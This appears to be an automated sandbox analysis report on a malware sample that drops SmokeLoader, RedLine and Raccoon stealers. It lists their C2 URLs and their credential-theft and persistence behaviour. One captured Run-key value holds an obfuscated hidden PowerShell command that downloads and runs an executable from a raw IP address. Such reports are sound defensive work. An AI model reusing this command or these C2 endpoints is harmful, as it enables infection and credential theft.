Analysis
-
max time kernel
151s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-08-2021 03:56
Static task
static1
Behavioral task
behavioral1
Sample
506962077b6d4f41f6879641bc8c8695.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
506962077b6d4f41f6879641bc8c8695.exe
Resource
win10v20210408
General
-
Target
506962077b6d4f41f6879641bc8c8695.exe
-
Size
319KB
-
MD5
506962077b6d4f41f6879641bc8c8695
-
SHA1
f2071382ba9d6eef51a56ca754247f669602440c
-
SHA256
22c622082b1db75bb23f602ff64c49158d9740e63a0441abe52a47e2f961b57b
-
SHA512
72cd80071468a9e893c6e434e81a0bf7c3ea4213e91b97ffb640fc5f6ae976b4332e0c27df0e290f8f008222f53d1248817add739f7a928fa8afd77f33ef1496
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
redline
@gasfer_dark
207.154.240.76:80
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5056 3964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 3964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 3964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 3964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4288 3964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4384 3964 schtasks.exe -
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/996-191-0x0000000004990000-0x0000000004A23000-memory.dmp family_raccoon behavioral2/memory/996-199-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/1840-202-0x0000000000A70000-0x0000000000BBA000-memory.dmp family_raccoon behavioral2/memory/1840-204-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon behavioral2/memory/4648-324-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D6BF.exe family_redline C:\Users\Admin\AppData\Local\Temp\D6BF.exe family_redline C:\Users\Admin\AppData\Local\Temp\F151.exe family_redline C:\Users\Admin\AppData\Local\Temp\F151.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3196 created 996 3196 WerFault.exe EEDE.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 37 4232 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 62 IoCs
Processes:
C8A5.exeC8A5.tmpC8A5.exeC8A5.tmpD6BF.exeDB64.exefsucenter.exeRuntimebroker.exeE4CB.exeEEDE.exeF008.exeF151.exeE4CB.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeinstall.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeRuntimeBroker.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 1352 C8A5.exe 3676 C8A5.tmp 4016 C8A5.exe 2160 C8A5.tmp 3048 D6BF.exe 2848 DB64.exe 672 fsucenter.exe 2276 Runtimebroker.exe 424 E4CB.exe 996 EEDE.exe 1840 F008.exe 544 F151.exe 4648 E4CB.exe 4164 Database.exe 4712 Database.exe 4728 install.exe 4804 HostData.exe 4820 Database.exe 4884 Database.exe 5012 Database.exe 5108 Database.exe 4200 Database.exe 1600 Database.exe 2244 Database.exe 4240 Database.exe 4344 Database.exe 4424 Database.exe 4056 Database.exe 2124 Database.exe 3200 Database.exe 3408 Database.exe 4448 Database.exe 4524 Database.exe 4592 Database.exe 3948 Database.exe 4028 Database.exe 4568 Database.exe 4632 Database.exe 3848 Database.exe 1724 Database.exe 4688 Database.exe 3744 Database.exe 2544 Database.exe 4148 Database.exe 4708 Database.exe 4764 Database.exe 1896 Database.exe 4828 install.exe 4872 install.exe 4916 Database.exe 5076 Database.exe 2256 Database.exe 4060 Database.exe 2168 Database.exe 2024 Database.exe 4016 Database.exe 4292 Database.exe 3932 RuntimeBroker.exe 496 Database.exe 3876 Database.exe 640 Database.exe 2172 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 2724 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 6 IoCs
Processes:
fsucenter.exeF008.exepid process 672 fsucenter.exe 1840 F008.exe 1840 F008.exe 1840 F008.exe 1840 F008.exe 1840 F008.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D6BF.exe themida C:\Users\Admin\AppData\Local\Temp\D6BF.exe themida behavioral2/memory/3048-142-0x0000000000F20000-0x0000000000F21000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Google\\Temp\\GUM18A1.tmp\\explorer.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\WindowsHolographicDevices\\SpatialStore\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Prefetch\\ReadyBoot\\WmiPrvSE.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\shellstyle\\RuntimeBroker.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\mfvdsp\\RuntimeBroker.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HostData = "\"C:\\ProgramData\\Systemd\\process\\HostData.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeD6BF.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D6BF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SysWOW64\mfvdsp\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d install.exe File created C:\Windows\SysWOW64\shellstyle\RuntimeBroker.exe install.exe File created C:\Windows\SysWOW64\shellstyle\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d install.exe File created C:\Windows\SysWOW64\mfvdsp\RuntimeBroker.exe install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
D6BF.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 3048 D6BF.exe 4164 Database.exe 4164 Database.exe 4164 Database.exe 4712 Database.exe 4712 Database.exe 4712 Database.exe 4820 Database.exe 4820 Database.exe 4820 Database.exe 4884 Database.exe 4884 Database.exe 4884 Database.exe 5012 Database.exe 5012 Database.exe 5012 Database.exe 5108 Database.exe 5108 Database.exe 5108 Database.exe 4200 Database.exe 4200 Database.exe 4200 Database.exe 1600 Database.exe 1600 Database.exe 1600 Database.exe 2244 Database.exe 2244 Database.exe 2244 Database.exe 4240 Database.exe 4240 Database.exe 4240 Database.exe 4344 Database.exe 4344 Database.exe 4344 Database.exe 4424 Database.exe 4424 Database.exe 4424 Database.exe 4056 Database.exe 4056 Database.exe 4056 Database.exe 2124 Database.exe 2124 Database.exe 2124 Database.exe 3200 Database.exe 3200 Database.exe 3200 Database.exe 3408 Database.exe 3408 Database.exe 3408 Database.exe 4448 Database.exe 4448 Database.exe 4448 Database.exe 4524 Database.exe 4524 Database.exe 4524 Database.exe 4592 Database.exe 4592 Database.exe 4592 Database.exe 3948 Database.exe 3948 Database.exe 3948 Database.exe 4028 Database.exe 4028 Database.exe 4028 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
506962077b6d4f41f6879641bc8c8695.exeE4CB.exeinstall.exedescription pid process target process PID 652 set thread context of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 424 set thread context of 4648 424 E4CB.exe E4CB.exe PID 4728 set thread context of 4872 4728 install.exe install.exe -
Drops file in Program Files directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\explorer.exe install.exe File created C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe -
Drops file in Windows directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\Prefetch\ReadyBoot\WmiPrvSE.exe install.exe File created C:\Windows\Prefetch\ReadyBoot\24dbde2999530ef5fd907494bc374d663924116c install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3864 996 WerFault.exe EEDE.exe 384 996 WerFault.exe EEDE.exe 416 996 WerFault.exe EEDE.exe 2812 996 WerFault.exe EEDE.exe 3196 996 WerFault.exe EEDE.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
506962077b6d4f41f6879641bc8c8695.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4384 schtasks.exe 5056 schtasks.exe 5104 schtasks.exe 5024 schtasks.exe 4112 schtasks.exe 4288 schtasks.exe -
Modifies registry class 1 IoCs
Processes:
install.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings install.exe -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034